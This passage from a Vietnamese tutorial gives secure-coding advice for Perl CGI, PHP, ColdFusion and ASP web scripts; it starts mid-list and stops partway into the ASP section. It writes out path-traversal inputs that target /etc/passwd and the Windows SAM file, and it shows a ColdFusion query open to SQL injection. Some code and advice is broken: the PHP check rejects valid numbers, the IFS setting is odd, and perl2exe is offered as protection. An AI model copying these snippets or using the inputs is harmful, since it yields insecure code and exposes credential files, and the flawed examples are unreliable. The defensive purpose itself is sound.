a - Tránh thực thi các web server dưới quyền quản trị (root trong Unix và adminitrator trong Windows). Khi các script ở web server được chạy có quyền quản trị sẽ rất nguy hiểm nếu ai đó dùng nó để thực hiện các lệnh điều khiển hệ thống. Các bạn có thể thấy script cgi-telnet là một ví dụ cụ thể.
b - Luôn thực hiện tiền xử lý các thông tin người dùng nhập vào, như các giá trị tên người dùng, mật khẩu, giá cả...Tạo một chuỗi các kí tự hợp lệ tương ứng với thông tin cần nhập và lọc ra những kí tự được nhập không chính xác. Chẳng hạn với tên và mật khẩu người dùng, ta có thể giới hạn ở các kí tự hợp lệ sau: "0..9", "a..z", "A..Z"; không cho phép hoặc lọc bỏ các kí tự đặc biệt như: "/\+)({}[]'-_=.|" ... Một ví dụ khác về việc dùng perl thực hiện tiền xử lý với email người dùng, với yêu cầu email phải có kí hiệu @ và dấu chấm "." ở ít nhất là phần sau dấu @:

if ($email !~ /^[\w-]+\@[\w.-]+$/)
{
print "<br>#Error in your email. Please re-enter<br>";
}else
{
# thực hiện xử lý đối với thông tin email hợp lệ;
}

c - Hạn chế không cho phép thực thi các lệnh hệ thống (shell command) như open(), fork(), system(), exec() hoặc cho thực hiện sau khi đã kiểm tra chặt chẽ các tham số truyền vào. Ở các hệ thống bảo vệ lỏng lẻo, hacker có thể lợi dụng truyền các tham số không thích hợp vào các hàm trên để thực hiện các lệnh xem thông tin và điều khiển hệ thống.
d - Trên các hệ thống Unix, cần thiết lập các thông số $PATH và $IFS bằng các giá trị chính xác cụ thể, tránh dùng các biến môi trường.
Ví dụ ta đặt như sau:

$ENV{"PATH"}="/bin:/usr/bin:/opt";
$ENV{"IFS"}="/";

Việc chỉ định không rõ ràng các thông tin trên có thể tạo điều kiện cho hacker sửa đổi chúng và bắt các chương trình của chúng ta phải thực thi một chương trình nguy hiểm nào đó ở nơi khác thay vì tại vị trí ta mong muốn.
e - Kiểm tra kích thước và chiều dài của các thông tin người dùng nhập vào hoặc dùng biến $ENV{CONTENT_LENGTH} để hạn chế chiều dài của chuỗi dữ liệu cho các yêu cầu GET/POST. Nếu không được kiểm tra chính xác, hacker có thể gửi đi một lượng dữ liệu có giá trị rất lớn hoặc rất dài có thể gây nên các lỗi tràn bộ đệm, hỏng web server và thậm chí tìm được các điều kiện phát sinh lỗi tràn bộ đệm và thực thi các lệnh nguy hiểm từ xa.
f - Tránh cho phép chỉ định đường dẫn cụ thể ở các trường dữ liệu hoặc ở các tham số truyền vào các chương trình. Chỉ nên cho phép các đường dẫn mang tính tương đối, cắt bỏ các giá trị có dạng dot dot ".." hoặc slash "/\". Ở rất nhiều chương trình web không kiểm tra đúng đã cho phép người dùng nhập các tham số ví dụ như /../../../../etc/passwd (Unix) hoặc /../../../winnt/repair/sam._ (NT/2k) và dễ dàng lấy được các thông tin về mật khẩu.
g - Sử dụng khả năng taint checking của perl để theo dõi và kiểm tra giá trị của các biến.
h - Các chương trình perl được lưu trữ dưới dạng text đơn giản do đó có thể dễ dàng bị xem mã nguồn và lấy các thông tin có giá trị khác tên, mật khẩu truy cập cơ sở dữ liệu...nếu hacker đoạt được quyền điều khiển hệ thống hoặc có quyền xem hệ thống file. Ta có thể dùng một số chương trình ví dụ như perl2exe cho phép chuyển đổi các tệp perl dạng text sang dạng chương trình thực thi .exe, như vậy có thể tránh được việc bị xem mã nguồn và không còn cần trình thông dịch perl khi chạy.

5. PHP (Personal Home Page)
Được phát triển từ năm 1995 và dần được bổ sung qua một số phiên bản, cho đến nay PHP trở thành một trong những ngôn ngữ script phía server phổ biến nhất bên cạnh Perl và ASP (Active Server Pages). Tương tự như Perl, PHP có dạng cú pháp, câu lệnh đơn giản, dễ hiểu - đặc biệt thích hợp với các lập trình viên có hiểu biết về ngôn ngữ C/C++ - đồng thời có ưu điểm là thực thi rất nhanh và có thể chạy ở máy client hoặc như một ứng dụng độc lập. Hiện nay người ta thường dùng PHP để thực hiện các tác vụ xử lý phía server ở các web server trên nền Unix, điển hình như Apache. Các chương trình PHP thường có phần mở rộng là .php, .php3, .php4; mã PHP cũng có thể nhúng vào một trang HTML. Hãy xem ví dụ sau thực hiện in lên trình duyệt một chuỗi kí tự:

<!-- PHP Example in HTML
<html>
<?php
echo "<br>Hello World!<br>";
?>
</html>

Chú ý thẻ <? và ?> dùng để đánh dấu nơi bắt đầu và kết thúc mã PHP.
Cho đến nay, những điểm yếu của PHP được phát hiện tương tự như ở ngôn ngữ Perl. Đặc biệt khi sử dụng PHP để nhận các thông tin nhập từ người dùng thông qua trình duyệt và xử lý cơ sở dữ liệu bên dưới; hoặc thực thi các lệnh hệ thống như system(), shellexec(), exec(), passthru()...ta cần chú ý thực hiện việc kiểm tra và lọc những dữ liệu truyền vào không hợp lệ để tránh trường hợp người dùng nhập dữ liệu sai, đánh lừa hệ thống sinh ra những kết quả không mong muốn, thậm chí thực thi các lệnh từ xa.
Ví dụ sau thực hiện việc kiểm tra đơn giản trên chuỗi $value có kiểu số, dùng hàm định nghĩa sẵn preg_match():

if (preg_match("/^[0-9]+$/i", $value))
echo "Invalid number!\n";
return 1;
break;

Các bạn tham khảo thêm các thông tin về PHP tại http://www.php.net/

6. ColdFusion
ColdFusion (CF) là hệ thống phát triển ứng dụng web của công ty Allaire (http://www.allaire.com) với phiên bản mới nhất hiện nay là 5.0. CF có 3 thành phần chính bao gồm: Application Server, Markup Language và Studio. Chúng ta sẽ tìm hiểu sơ lược qua từng thành phần này.

Application Server (Máy chủ ứng dụng) - Đây là thành phần chính của ColdFusion có thể chạy trên các nền Windows và Unix. Application Server chạy trên web server và xử lý các yêu cầu từ các trang mã ColdFusion.

Markup Languge (CFML) - Là ngôn ngữ web phía server được phát triển tuân theo quy ước HTML bao gồm các thẻ và thuộc tính của thẻ. CFML được dùng kết hợp với Application Server tạo nên các các ứng dụng web như các shopping card, quản lý tài khoản ngân hàng trực tuyến...Chương trình ColdFusion có phần mở rộng bắt buộc là .CFM.
Tương tự như Perl và PHP, các tệp CFM được lưu trữ ngầm định dưới dạng text đơn giản do đó chúng có thể dễ dàng bị xem mã nguồn dẫn đến lộ những thông tin quan trọng. Về mặt cấu trúc CFM giống như HTML ở chổ dùng các thẻ tag để thực hiện hầu hết các tác vụ chẳng hạn như kết nối cơ sở dữ liệu, hỗ trợ POP (Post Office Protocol) và SMTP (Simple Mail Transfer Protocol), COM (Component Object Model). Ngoài ra, có rất nhiều third-party add-ons được viết ra để tăng cường các tính năng của ColdFusion, tuy nhiên chúng thường không được cung cấp miễn phí.
Ví dụ sau dùng CFM để mô tả một câu lệnh rút trích dữ liệu:

<CFQUERY DATASOURCE="QLSV" NAME="SV">
SELECT MaSV, NameSV, BD
FROM DSSV WHERE MaSV = #URL.MaSV#
</CFQUERY>

Thuộc tính DATASOURCE của thẻ <CFQUERY> xác định một ODBC data source (nguồn dữ liệu). Thuộc tính NAME được dùng sau này khi cần trình bày kết quả lên browser.
Khi thực hiện trên browser, URL có dạng như sau:
http://www.anysite.com/cfm/getdata.cfm?MaSV=TH001
Như vậy, nếu các tham số truyền vào không được kiểm tra và lọc tốt, người dùng có thể truyền vào các giá trị không chuẩn làm thay đổi điều kiện của câu lệnh SELECT, dẫn đến việc họ có thể lấy được toàn bộ dữ liệu của các sinh viên khác.
Để trình bày kết quả của câu lệnh SELECT trên, hãy tham đoạn mã sau:

<HEAD>Thong Tin Sinh Vien</HEAD>
<CFOUTPUT QUERY="SV">
<LI>#NameSV#, #BD#, (#MaSV#)</LI><BR>
</CFOUTPUT>


Studio - Cung cấp một môi trường cho người dùng phát triển các ứng dụng web.

Cho đến nay, có 2 vấn đề bảo mật thường gặp với CFM là việc lọc không tốt các tham số truyền vào và cung cấp sẵn nhiều script ví dụ (như openfile.cfm, exprcalc.cfm) mà hacker có thể lợi dụng để dùng cho mục đích của mình như upload file, xem nội dung file, điều khiển các dịch vụ web hoặc thậm chí thực thi các lệnh nguy hiểm khác.
Giải pháp đơn giản để giảm nguy cơ bị tấn công là xóa bỏ các script cung cấp sẵn không cần thiết hoặc cập nhật các bản sửa lỗi cho các script và lọc kĩ các giá trị truyền vào.

7. ASP (Active Server Pages)
ASP là môi trường ngôn ngữ script phía server của Microsoft phát triển chủ yếu phục vụ cho các web server IIS (Internet Information Server). ASP có thể được dùng kết hợp với HTML, mã script và các thành phần ActiveX phía server tạo nên các trang thông tin có nội dung động; thực thi các lệnh hệ thống, kết nối cơ sở dữ liệu, COM...
Ngôn ngữ ngầm định dùng cho ASP là VBScript, đây là phiên bản script của ngôn ngữ Visual Basic quen thuộc. Tương tự một số ngôn ngữ script khác, có 2 dạng VBScript dùng cho ASP. Với script phía server, ta đặt mã lệnh trong thẻ <%@ và %>; phía client, ta dùng thẻ HTML <script>